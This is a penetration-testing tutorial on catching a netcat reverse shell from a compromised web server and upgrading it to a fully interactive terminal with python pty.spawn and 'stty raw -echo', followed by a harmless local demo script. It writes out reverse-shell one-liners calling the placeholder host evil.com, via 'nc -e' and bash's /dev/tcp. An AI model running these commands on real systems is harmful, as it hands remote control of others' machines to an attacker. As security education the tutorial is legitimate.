NetCat shell upgrade
The holy grail during a pen test is a functioning shell. Once a hacker manages to execute commands on a target system, the next step is usually to make that system connect back to a machine the hacker controls. NetCat is often used for this purpose. NetCat is a small Unix tool that reads and writes raw data over TCP or UDP connections, so with it the input and output of a program such as /bin/bash can be attached to a network socket. However, one of the biggest frustrations for hackers is that the shell obtained this way is quite limited. Depending on the system, the binary is called nc, netcat or ncat.
Hacking with NetCat
Suppose a hacker managed to upload a file called shell.php to a web server and can use it to run commands on that server.
The hacker starts a listener on his own server (evil.com) on port 4444 with nc -lvp 4444. Then the command nc -e /bin/bash evil.com 4444 is executed on the hacked server: netcat connects out to the hacker's server and attaches the standard input and output of /bin/bash to that connection. Because the victim initiates the connection, this is called a reverse TCP shell; it also gets through firewalls that only block incoming connections. Note that the -e option exists in netcat-traditional and in ncat, but not in the OpenBSD netcat that many distributions install by default. If it is missing, bash's own /dev/tcp redirection gives the same result: bash -i >& /dev/tcp/evil.com/4444 0>&1.
john@Technetium:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [1.2.3.4] port 4444 [tcp/*] accepted (family 2, sport 54490)
whoami
cyberant
^C
john@Technetium:~$ whoami
john
Above is what the hacker will see. There is no terminal behind this shell: bash is simply reading commands from the socket, so there is no prompt, no command history and no tab completion, and programs that need a terminal to ask for a password (such as su or mysql) refuse to run. Worse, CTRL-C is interpreted by the hacker's local terminal, which sends SIGINT to the local nc listener: the listener dies, the connection is lost and the shell is gone.
How to upgrade a Netcat Shell to an interactive shell?
The first step is to put a real terminal (a pseudo-terminal, or pty) behind the shell. Python's pty module can spawn bash inside a pseudo-terminal; run the following inside the netcat shell on the hacked server (on systems that only have Python 3, use python3 instead of python):
python -c 'import pty; pty.spawn("/bin/bash")'
The above command produces a semi-interactive shell: programs such as su and mysql, which ask for a password, now work because they see a terminal. The shell still dies on CTRL-C, because that key is still handled by the local terminal (which kills the local nc) instead of being passed to the remote side, and tab completion still doesn't work either, because the local terminal buffers each line until Enter is pressed, so the remote shell never sees the TAB in time. With a few simple commands (and a little magic) it is possible to go to a full shell.
Press CTRL-Z: the local terminal suspends nc and returns to the local shell. The remote shell is untouched; only the listener is stopped. Now type, in the local terminal:
stty raw -echo; fg
stty raw switches off line buffering and the interpretation of control characters in the local terminal, so every keystroke, including CTRL-C, TAB and the arrow keys, is forwarded straight to the remote pty, which handles it instead of the local one. -echo stops the local terminal from printing what is typed, because the remote pty already echoes it; without it every character would appear twice. fg brings nc back to the foreground. The two commands are best typed on one line, since once the terminal is raw anything typed afterwards is typed blind.
The above ensures that there is now a full shell that can do everything that could be done via SSH. Features such as tab completion and history now work, and CTRL-C interrupts the remote program instead of killing the listener. And vim through NetCat? Sure! Two finishing touches are worth doing in the remote shell: the remote pty knows neither the terminal type nor the window size, so run export TERM=xterm and stty rows N cols M (take N and M from the output of stty size in the local terminal), otherwise full-screen programs such as vim draw wrongly. And when the session ends, the local terminal is still in raw mode without echo; type reset (blind) to get it back to normal.
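The script below is an added example and not part of the original article. It reproduces the whole story locally, with no network involved: the check that a password prompt performs, the same check run under the article's python pty.spawn call, and a helper that builds the TERM and window-size fix-up line for the remote side. The function names and the probe text are mine; /bin/sh and python3 are assumed to be installed.

```shell
#!/bin/sh
# Added example (not from the original article): show locally why a bare
# netcat shell is "limited" and why running the shell under python's pty
# module fixes it. Nothing here touches the network.

# What programs such as su and mysql check before prompting for a password:
# is standard input a terminal?
PROBE='if [ -t 0 ]; then echo tty; else echo notty; fi'

# Case 1, the bare reverse shell: bash reads its commands from the socket
# that nc hands it, so there is no terminal at all. A pipe stands in for
# the socket here; the answer is the same.
probe_without_pty() {
    printf '%s\n' "$PROBE" | /bin/sh
}

# Case 2, after the upgrade: the same shell, but started by pty.spawn inside
# a pseudo-terminal, exactly as the article's one-liner does (with
# "sh -c PROBE" in place of /bin/bash). The pty turns "\n" into "\r\n" on
# output, so the carriage return is stripped before the result is compared.
probe_with_pty() {
    python3 -c 'import pty, sys; pty.spawn(["/bin/sh", "-c", sys.argv[1]])' \
        "$PROBE" </dev/null | tr -d '\r'
}

# Case 3, the last fix-ups a raw-mode shell still needs: TERM and the window
# size are not carried over the socket, so they have to be set by hand on
# the remote side. Given the output of `stty size` ("rows cols") and $TERM
# from the local terminal, this returns the line to paste into the upgraded
# remote shell.
remote_fixup_cmds() {
    size="$1"          # e.g. "24 80", as printed by `stty size`
    term="$2"          # e.g. "xterm-256color"
    rows=${size% *}    # everything before the space
    cols=${size#* }    # everything after the space
    printf 'export TERM=%s; stty rows %s cols %s\n' "$term" "$rows" "$cols"
}

# Run the probes side by side when executed directly.
echo "bare nc-style shell : $(probe_without_pty)"   # notty
echo "inside pty.spawn    : $(probe_with_pty)"      # tty
echo "remote fix-up line  : $(remote_fixup_cmds "24 80" xterm)"
```

On a real engagement the third function is the only piece that runs on the hacker's side: its output is pasted into the remote shell after the stty raw -echo; fg step, so that vim and other full-screen programs know how big the terminal is.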